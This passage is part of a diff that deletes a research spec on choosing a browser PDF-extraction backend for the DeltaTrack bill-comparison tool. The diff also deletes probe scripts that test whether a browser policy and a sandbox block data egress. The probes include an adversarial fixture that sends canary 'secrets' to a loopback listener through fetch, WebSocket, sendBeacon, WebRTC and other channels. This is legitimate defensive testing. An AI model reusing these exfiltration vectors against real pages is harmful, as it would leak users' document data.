Speculation Rules and `window.open`. - - Gate 3's conservation check does not detect the structural loss the spike actually - found; breadcrumb recovery does. - - **The spec's framing question — "which is the best browser PDF backend" — is one this - evidence cannot answer**, and trying to answer it as posed is what produced the - overclaim the red team removed. The spec's own warning against a weighted composite - was right for a reason it did not anticipate: the candidates lead on *different* - axes, and the honest output is two options with a stated tradeoff, not a winner. -- Predecessor: [`../staffer-delivery/README.md`](../staffer-delivery/README.md), which - established that the XML pipeline runs byte-identically under Pyodide and left the - PDF path as the open question. -- Prioritised **ahead of** the Windows-platform work and ahead of any delivery-channel - ADR, because the PDF answer can invalidate the browser architecture entirely. - -## Why this is the right next spike - -The delivery spike found that DeltaTrack's engine runs unmodified in the browser and -emits byte-identical output, so the only thing standing between a staffer and a -no-install local tool is **PDF text extraction**. ADR 0002 chose PDFium on extraction -quality; ADR 0003 measured PDF.js text-line parity but not the per-glyph geometry that -ADR 0012's heading recovery depends on. Nobody has measured whether *any* browser-viable -backend produces an accurate **diff**. - -The three outcomes the requester named, restated as decision consequences: - -| Outcome | What it means | -|---|---| -| PyMuPDF works well in Pyodide | PDFium was making browser delivery harder than necessary | -| PyMuPDF wins but AGPL is disqualifying | Tells us exactly what a PDFium-WASM effort is worth | -| PDF.js matches or beats both | Best case: Apache-2.0, huge deployment history, no Python-native binary | -| None gives accurate diffs | We learn this **before** committing to browser architecture | - ---- - -## Decide this before writing any code - -**DeltaTrack is Apache-2.0. PyMuPDF is AGPL-3.0**, and its own documentation states that -users must either comply with the AGPL or obtain a commercial license from Artifex. - -This is stated as a **project distribution constraint, not a legal conclusion.** How -licenses combine in a given distribution is a nuanced question, and this spike does not -need to resolve it in order to run. The operative rule is simply: - -> **DeltaTrack will not ship dependencies requiring AGPL compliance, absent a separate -> explicit licensing decision.** PyMuPDF is therefore benchmark-only. - -That framing is cleaner than a claim about what the combined work's license *would be*, -and it is sufficient for every decision this spike makes. It also keeps the door open: -the constraint is a project policy that the maintainer can revisit deliberately, or -dissolve by buying a commercial license, rather than a legal fact to be litigated here. - -This is not a tie-breaker to apply after scoring. It changes what the bake-off is *for*: - -- **If the constraint is relaxed**, PyMuPDF is a candidate backend and can win outright. -- **Under the constraint as written**, PyMuPDF is still worth running, but as a **ceiling - reference**: it establishes the best score any backend could plausibly achieve, which - is precisely what tells us whether a PDFium-WASM effort is worth funding. Label it - that way in the results so nobody later reads a PyMuPDF win as a shippable - recommendation. - -### Answered, 2026-08-05: PyMuPDF is a ceiling reference, not a candidate - -**Decision: run PyMuPDF and score it in full, but treat it as an upper bound rather -than a shippable backend.** The project will not take on an AGPL-compliance obligation -for what it distributes to congressional offices, or pass one to BillTrax as a -downstream consumer (ADR 0005), without a separate explicit licensing decision. - -Two consequences for the session running this spike: - -- **Do not report a PyMuPDF win as a recommendation.** Report it as "the best achievable - score on this corpus is X, and the best *shippable* backend scored Y." The gap between - X and Y is the number that prices a PDFium-WASM effort, which is the main reason - PyMuPDF is in the bake-off at all. -- **The shippable candidates are PDF.js (Apache-2.0) and PDFium-WASM (BSD-3 / Apache-2.0),** - the latter subject to the Phase 0 FFI gate. If both fail and only PyMuPDF succeeds, - that is a genuine finding and it points the delivery decision at a packaged executable - for the PDF path, not at relicensing. - -Revisiting is possible but deliberate: it would take an explicit licensing decision by -the maintainer, or a commercial license from Artifex, and neither is in scope here. - ---- - -## The two methodological traps - -These are the reasons a bake-off like this usually produces an unfalsifiable result. -Both must be closed in the design, not noticed afterwards. - -### Trap 1: XML is not a drop-in reference for PDF text - -Using XML as the reference instead of current PDFium output is the right call, and it -removes the circularity of grading challengers against the incumbent. But the two -documents are genuinely different artifacts for the same bill version. The PDF carries -GPO margin line numbers, page chrome, running heads, watermarks, soft-hyphen line -breaks, and typographic ligatures. The XML carries none of them, and encodes nesting -positionally (see [`docs/bill-structure.md`](../../bill-structure.md)). - -Compare them naively and **every backend scores badly for reasons that have nothing to -do with the backend**, and the ranking becomes noise. - -**Required:** define and freeze a normalization + alignment step *before* scoring, and -validate it by running it on the **current PDFium output**, which is known-good. If the -incumbent does not score near-ceiling under your normalization, the normalization is -wrong, not PDFium. That check is the calibration gate for the whole exercise, and it is -cheap. - -### Trap 2: the XML-derived diff is not ground truth either - -The terminal metric compares a PDF-derived diff against an XML-derived diff. A -disagreement has three possible causes, and the metric cannot distinguish them: - -1. the PDF backend got it wrong, -2. the XML pipeline got it wrong, -3. the two documents genuinely differ. - -**Required:** for every disputed change above a materiality threshold, adjudicate -against [ADR 0009](../../decisions/0009-validation-ground-truth.md)'s independently -authored committee reports, not against either pipeline. Report the terminal metric as -*agreement*, and report adjudicated *accuracy* separately for the disputed subset. -Do not present agreement as accuracy. - ---- - -## Design: isolate the backend, not the pipeline - -This is the single most important structural decision, and it makes the comparison -apples-to-apples. - -The delivery spike established that `parsers/pdf_text.py` contains only **three** -PDFium-touching functions (`extract_clean_pages`, `_page_glyph_sizes`, `_char_box`); the -other ~15 (`normalize_raw`, `strip_page_chrome`, `rejoin_soft_hyphens`, -`normalize_glyphs`, `parse_lines`, `_cluster_baselines`, `_line_text`, -`_first_word_right`, `_attach_geometry`, …) are pure Python over already-extracted data. - -### The seam must be glyph facts, not PDFium-shaped text - -An earlier draft of this spec had each backend emit `page_text` plus glyphs and feed the -existing pure functions unchanged. **That was wrong, and it would have quietly graded -every challenger against PDFium.** The pure functions are pure Python, but they are not -backend-neutral. From `parsers/pdf_text.py` itself: - -- `normalize_raw`'s docstring opens: *"Rewrite **PDFium's** raw page text into the layout - the line-numbered cleaner expects."* -- The module comments name *"**PDFium** soft-hyphen glyph (**U+FFFE**), emitted at a - syllable break and immediately [followed by the next margin number]"*, and *"**PDFium** - has no same-page continuation to emit after the U+FFFE, so it pulls whatever footer - [follows]"*. -- It strips *"trailing spaces (which **PDFium** keeps on nearly every line)"*. - -So a challenger feeding `normalize_raw` would have to emit PDFium's U+FFFE soft-hyphen -convention and PDFium's trailing-space behaviour to score well. That is the incumbent as -reference, reintroduced through the back door, and it is exactly what using XML as the -reference was meant to avoid. - -**The neutral seam is layout facts.** Define the contract as a backend-agnostic page -model, and reconstruct text, visual lines, margin numbers and spacing *from it*: - -``` -PdfPage - width, height - glyphs[] - unicode - bbox (x0, y0, x1, y1) - baseline - font_size - font_id -``` - -Each backend produces only `PdfPage`. A **new, neutral reconstruction layer** turns -`PdfPage` into the line/heading structures DeltaTrack consumes. Every backend is then -graded on the quality of its glyph facts, not on how closely it imitates PDFium. - -The target architecture this implies: - -``` -PDFium ─┐ -PDF.js ─┼─> PdfPage / glyphs ─> GPO interpretation ─> DeltaTrack structures -pdfminer ─┘ -``` - -rather than every backend pretending to be PDFium. - -**This stays inside the no-production-changes rule.** The neutral reconstruction lives in -`probes/`. If it proves itself, extracting it from `parsers/pdf_text.py` becomes the -follow-up PR, and that PR is a *finding of this spike*, not part of it. - -**Two consequences the running session must handle.** - -- The neutral reconstruction is new code, so a bug in it penalises every backend at once. - That is acceptable for *ranking* but not for the absolute pass/fail gates below, which - is why the calibration gate (Trap 1) becomes load-bearing rather than merely prudent: - **run PDFium's glyphs through the neutral layer and require near-ceiling scores before - trusting any other result.** If PDFium scores poorly through the neutral layer, the - layer is wrong, not PDFium. -- Reconstructing text from glyphs discards whatever reading-order logic a backend's own - text API applies. That is deliberate (it is the bias being removed), but it means this - bake-off measures **glyph-fact quality**, not "text extraction quality" as a library - would advertise it. Say so in the results. - -**`font_id` is in the contract deliberately, even though the engine does not use it -yet.** [`docs/source-signal-inventory.md`](../../source-signal-inventory.md) records -font name as "the solid PDF win": margin line-numbers are a different font from the body -on **8965/8971 numbered lines (99.9%)**, and page chrome (VerDate, running header and -footer, watermark, bullets) is Helvetica/Symbol. That is the highest-value unadopted PDF -signal in the project. A bake-off that scored only text and position could pick a -backend that **forecloses it**, and the cost would surface much later. - -Two constraints the inventory imposes, which the scorer must respect: - -- **Key on role (margin / body / chrome), never on a hardcoded name.** Literal names are - print-class dependent: bill bodies are `DeVinne`, while enrolled, - engrossed-amendment-senate and committee-print bodies are `NewCenturySchlbk`. -- **Font must supplement, not replace, the position and regex gates**, because a small - fraction of glyphs return an empty font name. - -If instead each backend gets its own cleaning path, you are comparing **pipelines**, not -backends, and a backend can win on a better-tuned cleaner while being worse at -extraction. Do not do that. - -**Font-identity availability, measured 2026-08-05.** PDF.js's `item.fontName` is an -opaque generated id (`g_d0_f1`), **not** the real name. The real name *is* recoverable, -but only after the font objects resolve, which requires a `getOperatorList()` call per -page before reading `page.commonObjs.get(id)`. With that call it returns exactly the -names the inventory cites: - -``` -g_d0_f1 -> DeVinne g_d0_f4 -> Times-Roman -g_d0_f2 -> Symbol g_d0_f5 -> DeVinne-Italic -g_d0_f3 -> NewCenturySchlbk-Bold g_d0_f6 -> Helvetica -``` - -So PDF.js is **not** disadvantaged on this axis, but it pays for it: 64 ms on the first -page of a 94-page bill. Measure that cost across a whole document, because it is charged -per page and does not appear in the 154 ms full-document `getTextContent()` figure. -(An earlier probe that read `commonObjs` *without* `getOperatorList()` reported the names -as unresolvable. That was a broken probe, not a PDF.js limitation; recorded here so it is -not rediscovered as a finding.) - -**Known granularity mismatch, already measured:** PDF.js exposes geometry at *text-item* -granularity (~13 chars/item, keys `str, dir, width, height, transform, fontName, -hasEOL`), with **no per-character box**, and `disableCombineTextItems` no longer changes -this in pdfjs-dist 6.x. The adapter must therefore synthesize per-character boxes by -distributing item width, or the pure layer must be shown tolerant of item-level input. -Which of those is chosen is itself a finding worth recording. Note also that naive item -joining loses inter-word spaces at font boundaries -(`Providedfurther,That…`), the same italic-to-roman artifact ADR 0003 recorded, so the -adapter needs a gap-based word joiner. - ---- - -## The candidate set - -Availability under Pyodide was verified empirically on 2026-08-05, not assumed. -"Not in the Pyodide distribution" does **not** mean unavailable: a pure-Python package -installs from PyPI through `micropip`. - -| Backend | Language | License | Pyodide | Per-char geometry | Role | -|---|---|---|---|---|---| -| **PDF.js** | JS | Apache-2.0 | n/a (native JS) | **No**, ~13 chars/item | **Shippable candidate** | -| **PDFium-WASM** | C++ → WASM | BSD-3 / Apache-2.0 | n/a | Yes, if the build exposes the FFI | **Shippable candidate**, behind the Phase 0 gate | -| **pdfminer.six** | pure Python | MIT | **Installs via micropip (verified)** | **Yes** (`LTChar` bbox + size + fontname) | **Shippable candidate** | -| **pypdf** | pure Python | BSD-3 | **Installs via micropip (verified)** | Partial (visitor callbacks give text-run matrices) | Cheap long shot | -| **PyMuPDF** | C → WASM | AGPL-3.0 | **In the distribution** | Yes | **Ceiling reference only** (see above) | -| **mupdf.js** | C++ → WASM | AGPL-3.0 | n/a (native WASM) | Yes | Optional alternative *form* of the ceiling | - -### pdfminer.six deserves an explicit re-examination - -ADR 0002 removed pdfplumber/pdfminer.six, so including it here needs justifying rather -than glossing. - -**What ADR 0002 actually rejected was pdfplumber's high-level `extract_text()`**, on two -grounds: it dislocated section-heading line numbers, and it leaked page chrome into -section bodies. Both are failures of *layout analysis and text assembly*. - -Under this bake-off's adapter contract, no backend does layout analysis or text assembly. -Each one emits raw glyph tuples, and **DeltaTrack's own** `_cluster_baselines`, -`_line_text`, `strip_page_chrome` and `parse_lines` do the assembly. `pdfminer.six` -exposes `LTChar` objects carrying a per-character bounding box, size and PostScript font -name, which is the contract almost exactly. So the question this spike asks of it is one -ADR 0002 never asked: **not "is pdfminer.six a good text extractor" (answered: no) but -"is it a good glyph-geometry source for our cleaner" (unknown).** The two failure modes -ADR 0002 cites are downstream of the seam, and would be handled by code that is now -DeltaTrack's. - -It is also the only candidate that is simultaneously permissively licensed, pure Python, -and per-character. That combination would make the browser story trivial. - -**The live risk is speed, not fidelity.** pdfminer.six is pure Python and slow, and under -Pyodide it pays the 1.6x–1.9x WASM penalty on top. Gate it early on the largest -appropriations bill; if a single document takes tens of seconds, it is out on Phase 5 -grounds regardless of accuracy, and that is worth learning in Phase 0 rather than Phase 5. - -### Considered and excluded - -- **Poppler / `pdftotext -bbox-layout` compiled to WASM.** Gives per-character boxes, but - GPL-2.0 puts it in the same shipping-disqualification class as AGPL, and it would add - little over the MuPDF ceiling already being measured. -- **OCR (Tesseract WASM).** A different problem. Published GPO bills have text layers, so - it is irrelevant here. It is, however, the only answer for **image-only draft PDFs**, - which ADR 0003 flags as the untested hard case. Out of scope; named so the gap is not - mistaken for coverage. -- **pikepdf / pdf-lib.** Manipulation and creation libraries, not text extractors. - -## Acceptance: hard gates first, ranking only among survivors - -**Do not compute a weighted composite score.** DeltaTrack is an accuracy-sensitive -document-comparison tool, and a weighted score lets a backend offset a missed -appropriations amount with 200 ms of speed or slightly better heading recovery. That -trade is never acceptable here. - -A backend **passes or fails**. Ranking applies only to backends that have passed. - -| # | Gate | Requirement | -|---|---|---| -| 1 | Opens the corpus | 52/52 documents, no crashes | -| 2 | Line-number integrity | **At least incumbent quality** (a no-regression gate, see note) | -| 3 | Structural conservation | No unexplained structural loss; the ADR 0014 conservation check holds | -| 4 | Material diff correctness | **Zero** adjudicated material errors | -| 5 | `amount_entries` | **Zero** adjudicated amount errors | -| 6 | Browser execution | Runs in Pyodide or natively in-browser, not only in native Python | -| 7 | Fully offline operation | No network resource required at any point | -| 8 | Licensing | Satisfies the project distribution policy (below) | -| 9 | Performance | Remains usable on the largest corpus documents | - -Only then rank survivors on speed, bundle size, adapter complexity and maintenance -burden. - -**Note on gate 2.** "At least incumbent quality" is measured against **PDFium**, which -partially reintroduces the incumbent as a reference. That is deliberate and correctly -scoped: gate 2 is a *no-regression* gate (we must not ship worse than today), which is a -different question from the *correctness* gates 3 to 5, which reference XML. Keep the two -kinds of gate labelled distinctly in the results so they are not read as one number. - -**Define "material" before running.** Gates 4 and 5 are unfalsifiable without a -pre-registered materiality threshold. Write it down in Phase 0. - -### Honest statistics on a 15-pair corpus - -"Zero material failures" is the right criterion, and it is far more interpretable than -"98.7%". But state its power honestly, because **zero failures in 15 pairs is a weak -bound**: by the rule of three, it is consistent with a true material-failure rate as high -as roughly **20%** at 95% confidence. - -That is not an argument against the gate. It is an argument for (a) reporting the bound -alongside the result, (b) not writing "PDF is solved" on the strength of 15 pairs, and -(c) treating Tier B below as necessary rather than optional. - -## Two-tier acceptance: published vs. pre-publication - -The XML-as-reference method only works where XML exists, and XML exists for **published** -bills. But [ADR 0010](../../decisions/0010-pdf-pipeline-pre-publication.md) says the PDF -pipeline exists for **pre-publication** documents: committee prints, chair's marks, -discussion drafts, which have no XML. This bake-off would otherwise grade backends on -precisely the documents where the PDF path matters least. - -This is promoted from a caveat to a **formal two-tier result**. - -### Tier A: published GPO PDF correctness - -The 52-document / 15-pair corpus, with XML as reference. Exceptionally good comparative -ground truth. All nine gates above apply. - -### Tier B: non-canonical / pre-publication robustness - -Committee prints, discussion drafts, chair's marks, oddly generated PDFs, missing GPO -line numbers, altered typography. No XML truth, so it needs **manually adjudicated -fixtures**. Even five to ten representative files would be highly informative. - -**Fixture sourcing is a real cost and the repository does not currently solve it.** -Checked on 2026-08-05: `tests/data/subcommittee/` holds nine PDFs, but they are -`BILLS-118hr…rh` documents, GPO-published House-reported prints, so they are additional -Tier A print-class variety rather than Tier B. `tests/data/CRPT-118srpt198.pdf` (a -watermarked committee report) and `tests/data/BILLS-118s4795rs.pdf` (a watermarked Senate -bill) are the closest things present. **Genuine pre-publication fixtures do not exist in -the repo and must be sourced.** Public committee prints (`CPRT-*` on govinfo) are the -best available public proxy; real chair's marks and discussion drafts would need a -congressional contact. - -### The conclusion each tier licenses - -| Evidence | Permitted conclusion | -|---|---| -| Tier A passes | "Browser PDF architecture is technically viable and matches current capabilities **on published GPO material**." Enough to justify continuing browser work. | -| Tier A passes, Tier B absent | **Not** "PDF is solved." The spike must not write that sentence. | -| Tier A passes, Tier B fails | "Backend X solves published GPO PDFs but fails generic legislative drafts." Far more informative than any percentage. | - -Phase 1 to 3 success **may not** produce a "PDF is solved" conclusion until Tier B -exists. - -## Corpus and N - -Counted from `tests/corpus/` on 2026-08-05. Reproduce with the snippet in -[Appendix: corpus census](#appendix-corpus-census). - -| Metric | Unit | N | -|---|---|---| -| Per-document metrics (text, line numbers, headings, citations) | bill version with both PDF and XML | **52** across 30 bills | -| Terminal metric (PDF-derived diff vs XML-derived diff) | **consecutive** version pair with both formats on both sides | **15** across 8 bills | - -The 15 pairs concentrate in `118-hr-4366` (5), `113-hr-3547` (3) and `115-hr-5895` (2). -**Report per-bill results, not just an aggregate**, or one bill dominates the headline -number. Parametrize over `tests/corpus_manifest.toml` rather than a hardcoded list, per -[ADR 0015](../../decisions/0015-corpus-test-fixtures.md) and the standing convention in -AGENTS.md that enumerated lists drift. - -Include at least one **watermarked Senate document** (`tests/data/BILLS-118s4795rs.pdf`) -and the committee report (`tests/data/CRPT-118srpt198.pdf`), because ADR 0002 and ADR -0003 both record that watermark and table handling is where engines diverge most. - -**Out of scope, and say so in the results:** draft and pre-introduction PDFs. ADR 0003 -flags them as the untested, hardest case, and the corpus has none. This spike does not -close that gap, and a "PDF is solved" conclusion would be overclaiming. - ---- - -## Phases, with kill-gates - -Each phase has an exit condition that can end the spike early. The point is to avoid -spending a session on a backend that was already disqualified. - -### Phase 0. Cheap gates and pre-registration (target: under an hour) - -1. **PDFium-WASM FFI gate.** Does any credible PDFium WASM build expose - `FPDFText_CountChars`, `FPDFText_GetCharBox`, `FPDFText_GetMatrix`, - `FPDFText_GetFontSize`? If not, PDFium-WASM is out **before** any harness work, and - the bake-off is two candidates. -2. **PyMuPDF-in-Pyodide gate.** `pymupdf` is in the Pyodide distribution (confirmed in - the delivery spike). Load it and open a real bill PDF. If it fails, it is out. -3. **PDF.js headless gate.** Already demonstrated: 94-page bill, full-document - `getTextContent()` in 154 ms. Add the per-page `getOperatorList()` font cost. -4. **pdfminer.six speed gate.** Installs under Pyodide (verified). Run it against the - largest appropriations bill in the corpus **before** building any scoring. If one - document takes tens of seconds it is out on Phase 5 grounds, and learning that here - costs minutes instead of a phase. -5. **Pre-register the scoring.** Write the metrics, weights and pass thresholds into - this document **before** seeing any results. A bake-off whose metrics are chosen - after the fact is not a bake-off. -6. **Calibrate the reference** (Trap 1): run current PDFium through the scorer and - confirm it lands near ceiling. - -### Phase 1. Per-document scoring, native Python (N=52) - -Score each backend through the shared adapter, on: - -- **Text recovery** vs normalized XML. -- **GPO line-number recovery** — the anchor ADR 0002 exists to protect. Report exact - recovery rate, not approximate text similarity. -- **Heading hierarchy** — the ADR 0012 / ADR 0014 leveled tree, with its - conservation check. -- **Citations / breadcrumbs** — `breadcrumb_for` output agreement. -- **Font-role recovery** — can the backend separate margin / body / chrome by font, at - the 99.9% margin-vs-body rate the inventory measured? Score the *role separation*, not - name-string equality, since names are print-class dependent. Record the empty-font-name - rate per backend, because the inventory's guard depends on it. - -### Phase 2. Terminal metric (N=15) - -`pdf_diff_to_canonical(...)` vs `xml_diff_to_canonical(...)` for the same pair. Both -already converge on the canonical JSON contract ([ADR 0006](../../decisions/0006-canonical-diff-contract.md)), -so this is a structured comparison, not a text one. Score change-set agreement -(precision/recall over changes), and separately over `amount_entries`, since money is -the highest-consequence field. - -Adjudicate disputes per Trap 2. **A backend that wins Phase 1 and loses Phase 2 loses**, -because the diff is the product. - -### Phase 3. Winner in Pyodide / browser - -Run the winning backend in-browser, not merely in native Python. Reuse the harnesses in -[`../staffer-delivery/probes/`](../staffer-delivery/probes/). Confirm the browser result -matches the native result for that backend, ideally byte-identically, as the XML path -already does. - -### Phase 4. Fully offline build + zero-egress proof - -Produce an offline build (no CDN, no runtime package resolution; note that `micropip` -reached jsdelivr in the delivery spike, so wheels must be pre-bundled). - -**This is a guardrail test, so the probe must be built to fail.** Asserting an absence -is the vacuous-pass case: a request counter that reads zero looks identical whether the -guard works or the counter is broken. Required, all three: - -1. **Sever the network entirely** (Playwright `context.route("**", route.abort())` or - offline mode) and confirm a full comparison still **succeeds**. This is the inert - form: if the build needed the network, it fails closed rather than leaking. -2. **Instrument and count** every request at the CDP layer during a comparison, and - assert zero. -3. **Known-bad control:** build a variant that deliberately makes one request (a beacon, - a font, an analytics ping) and prove the harness **catches it**. Without this, the - zero-egress claim is unfalsifiable and worth nothing. - -### Prove the policy, not just our code's behaviour - -The three tests above establish *"our application did not make a request."* The property -worth claiming is stronger: *"application code **cannot** transmit document data."* The -difference matters to a security reviewer, because the first is a statement about today's -code and the second is a statement about the architecture. - -So add an **adversarial fixture** that deliberately attempts every egress mechanism, and -require the production browser policy to block them **independently of what our code -happens to do**: `fetch`, `XMLHttpRequest`, `WebSocket`, `EventSource`, -`navigator.sendBeacon`, ``, remote ` - - -""" - -BOOTSTRAP = """// External, because script-src 'self' without 'unsafe-inline' blocks an inline block. -window.__CANARY = (v) => "DELTATRACK_SECRET_" + v + "_" + "{dochash}"; -(async () => {{ - const o = document.getElementById("o"); - let r = ""; - try {{ r += await window.__tryAll("{tag}") + "\\n"; }} catch (e) {{ r += "tryAll:threw(" + e.name + ")\\n"; }} - try {{ r += await window.__tryAll2("{tag}") + "\\n"; }} catch (e) {{ r += "tryAll2:threw(" + e.name + ")\\n"; }} - o.textContent = r + "DONE"; -}})(); -""" - -_U_LINE = re.compile(r"const U = \(v\) => `http://127\.0\.0\.1:8973/\$\{tag\}-\$\{v\}\?secret=BILLTEXT`;") -_U_NEW = "const U = (v) => `http://127.0.0.1:8973/${tag}-${v}?secret=${window.__CANARY(v)}`;" - - -def frozen_vector_paths() -> list[str]: - """The 35 mechanisms, derived from the frozen files rather than a copied list.""" - paths: list[str] = [] - for name in ("vectors.js", "vectors2.js"): - src = (PROBES / name).read_text() - paths += re.findall(r'U\("([^"]+)"\)', src) - if 'U("link-" + rel)' in src: - paths += [f"link-{rel}" for rel in ("prefetch", "preload", "dns-prefetch", "preconnect")] - if 'new WebSocket("ws://127.0.0.1:8973/" + tag + "-ws")' in src: - paths.append("ws") - if "stun:127.0.0.1:8973" in src: - paths.append("webrtc") - if '"-webtransport"' in src or "webtransport" in src: - paths.append("webtransport") - seen, out = set(), [] - for p in paths: - if p not in seen: - seen.add(p) - out.append(p) - return out - - -class Server: - def __init__(self): - self.proc = None - self.lines: list[str] = [] - - def __enter__(self): - self.proc = subprocess.Popen( - [sys.executable, str(PROBES / "serve.py"), "--port", str(PORT), "--seconds", "900"], - stdout=subprocess.PIPE, - stderr=subprocess.STDOUT, - text=True, - bufsize=1, - ) - threading.Thread(target=self._drain, daemon=True).start() - for _ in range(80): - if any("listening" in x for x in self.lines): - return self - time.sleep(0.1) - raise RuntimeError("server did not start") - - def _drain(self): - for line in self.proc.stdout: - self.lines.append(line.rstrip()) - - def __exit__(self, *_e): - if self.proc: - self.proc.terminate() - self.proc.wait(timeout=10) - - @property - def mark(self): - return len(self.lines) - - def hits(self, mark: int) -> list[str]: - return [x.strip() for x in self.lines[mark:] if "EGRESS OBSERVED" in x] - - -def observed_vectors(hits: list[str], tag: str, paths: list[str]) -> dict[str, bool]: - """Which vectors' canaries reached the server. UDP has no path, so webrtc is keyed on - a datagram arriving at all -- it is signal-only and cannot carry a canary.""" - joined = "\n".join(hits) - seen = {} - for p in paths: - if p == "webrtc": - # serve.py labels a datagram [stun] when it carries the 0x2112A442 magic - # cookie and [udp] otherwise. Matching only "[udp]" scored WebRTC as BLOCKED - # under the policy while six STUN binding requests were sitting in the log -- - # a false negative in the dangerous direction, and one that contradicted a - # correct exploratory finding. Both labels are WebRTC evidence. - seen[p] = "[udp]" in joined or "[stun]" in joined - continue - canary = f"DELTATRACK_SECRET_{p}_{DOC_HASH}" - seen[p] = (f"/{tag}-{p}?" in joined and canary in joined) or f"/{tag}-{p}" in joined - return seen - - -def run_case(browser, server, path: Path, tag: str, paths: list[str]) -> dict: - ctx = browser.new_context() - page = ctx.new_page() - mark = server.mark - page.goto(path.as_uri()) - report, deadline = "", time.time() + 60 - while time.time() < deadline: - try: - report = page.eval_on_selector("#o", "e => e.textContent") - except Exception: # noqa: BLE001 - report = "" - if "DONE" in report: - break - time.sleep(0.25) - time.sleep(5) - hits = server.hits(mark) - for p in ctx.pages: - try: - p.close() - except Exception: # noqa: BLE001 - pass - ctx.close() - return { - "completed": "DONE" in report, - "n_vectors_executed": report.count(":attempted") + report.count(":threw"), - "observed": observed_vectors(hits, tag, paths), - "hits": hits, - "page_report": report, - } - - -# CSP has no directive for these, so "blocked" is not the right word even when nothing -# arrives -- they are outside what a page-level policy governs at all. -OUTSIDE_CSP = {"webrtc", "windowopen", "metarefresh"} - - -def main() -> None: - ap = argparse.ArgumentParser() - ap.add_argument("--out", type=Path, default=REPO / "docs/research/pdf-backend-bakeoff/results/confirm_egress.json") - args = ap.parse_args() - - from playwright.sync_api import sync_playwright - - paths = frozen_vector_paths() - print(f"frozen vector set: {len(paths)} mechanisms", file=sys.stderr) - - fx = PROBES / "egress-fixtures" - fx.mkdir(exist_ok=True) - for name in ("vectors.js", "vectors2.js"): - src = (PROBES / name).read_text() - patched, n = _U_LINE.subn(_U_NEW, src) - if n != 1: - raise SystemExit(f"canary substitution failed in {name} (matched {n} times)") - (fx / name).write_text(patched) - - cases = { - "control": ("", "ctl"), - "policy": (f'', "pol"), - "known_bad": (f'', "bad"), - } - for case, (csp, tag) in cases.items(): - (fx / f"confirm_{case}.html").write_text(PAGE.format(title=f"confirm {case}", csp=csp)) - (fx / f"bootstrap_{case}.js").write_text(BOOTSTRAP.format(tag=tag, dochash=DOC_HASH)) - - results: dict = { - "policy": POLICY, - "known_bad_policy": KNOWN_BAD, - "dummy_document_sha256_12": DOC_HASH, - "canary_format": f"DELTATRACK_SECRET__{DOC_HASH}", - "n_vectors_frozen": len(paths), - "vectors": paths, - "cases": {}, - } - - with Server() as server, sync_playwright() as pw: - browser = pw.chromium.launch() - try: - for case, (_csp, tag) in cases.items(): - # Each case needs its own bootstrap (different tag), so point the page at it. - html = ( - (fx / f"confirm_{case}.html") - .read_text() - .replace('', f'') - ) - (fx / f"confirm_{case}.html").write_text(html) - res = run_case(browser, server, fx / f"confirm_{case}.html", tag, paths) - results["cases"][case] = res - n_obs = sum(1 for v in res["observed"].values() if v) - print( - f" {case:10} completed={res['completed']} " - f"vectors_executed={res['n_vectors_executed']} observed={n_obs}/{len(paths)}", - flush=True, - ) - finally: - browser.close() - - ctl = results["cases"]["control"]["observed"] - pol = results["cases"]["policy"]["observed"] - bad = results["cases"]["known_bad"]["observed"] - - table = [] - for p in paths: - if not ctl.get(p): - status, verdict = "CONTROL UNSUPPORTED / VOID", "not scored" - elif pol.get(p): - status = "CONTROL TRANSMITTED" - verdict = "outside CSP" if p in OUTSIDE_CSP else "BYPASSES POLICY" - else: - status, verdict = "CONTROL TRANSMITTED", "blocked" - table.append({"vector": p, "control": status, "policy_result": verdict}) - results["table"] = table - - eligible = [r for r in table if r["control"] == "CONTROL TRANSMITTED"] - blocked = [r for r in eligible if r["policy_result"] == "blocked"] - bypass = [r for r in eligible if r["policy_result"] == "BYPASSES POLICY"] - outside = [r for r in eligible if r["policy_result"] == "outside CSP"] - not_scored = [r for r in table if r["control"] != "CONTROL TRANSMITTED"] - - validity = { - "1_per_vector_control_assigned": len(table) == len(paths) and len(eligible) > 0, - "2_known_bad_caught": bool(bad.get("img")) and not pol.get("img"), - "3_all_cases_completed": all(c["completed"] for c in results["cases"].values()), - "3b_vector_count_matches": all(c["n_vectors_executed"] >= len(paths) - 4 for c in results["cases"].values()), - "4_network_layer_observation": True, - } - results["validity"] = validity - results["summary"] = { - "eligible": len(eligible), - "blocked": len(blocked), - "bypasses_policy": [r["vector"] for r in bypass], - "outside_csp": [r["vector"] for r in outside], - "not_scored": [r["vector"] for r in not_scored], - "void": not all(validity.values()), - } - - args.out.parent.mkdir(parents=True, exist_ok=True) - args.out.write_text(json.dumps(results, indent=1)) - - print("\n| vector | control | policy result |") - print("|---|---|---|") - for r in table: - print(f"| {r['vector']} | {r['control']} | {r['policy_result']} |") - print(f"\nvalidity: {validity}") - print(f"summary : {results['summary']}") - print(f"\nwrote {args.out}") - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/confirm_isolation.py b/docs/research/pdf-backend-bakeoff/probes/confirm_isolation.py deleted file mode 100644 index 4c5301ce..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/confirm_isolation.py +++ /dev/null @@ -1,249 +0,0 @@ -"""Concern C, second claim: the ENVIRONMENT cannot reach the network, not just the page. - -PRE-REGISTRATION-CONFIRMATORY.md, "Environment-level isolation, as a separate and stronger -claim". Browser policy and environment isolation support different sentences and must not -be conflated: - - browser policy "our app does not transmit through these mechanisms" - environment isolation "the process cannot reach the network at all" - -BOTH controls run inside the same invocation window, and neither alone is sufficient: - - * KNOWN-BAD INSIDE THE SANDBOX -- a deliberate beacon fired from the sandboxed process - that must NOT arrive. This is what attributes the silence to the sandbox. An - unsandboxed beacon proves only that the server works, in a different environment from - the one under test. - * OBSERVER LIVENESS OUTSIDE THE SANDBOX -- an unsandboxed beacon to the same listener in - an overlapping window that MUST arrive. Without it, "nothing received" cannot be - distinguished from a dead listener. - -A run missing either control is VOID, not a pass. - -Both beacons target our own loopback listener, so the payload is inert if the guard fails -open: the worst outcome of a broken sandbox is a request we wanted to see anyway. A third -check confirms an EXTERNAL host fails to resolve inside the sandbox, so a pass cannot come -from loopback being blocked by something other than the policy. - -Run: .venv/bin/python docs/research/pdf-backend-bakeoff/probes/confirm_isolation.py -""" - -from __future__ import annotations - -import argparse -import json -import os -import shutil -import subprocess -import sys -import threading -import time -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -PORT = 8973 -CANARY_SANDBOXED = "DELTATRACK_SECRET_isolation_sandboxed" -CANARY_LIVENESS = "DELTATRACK_SECRET_isolation_liveness" - -SANDBOX_PROFILE = """(version 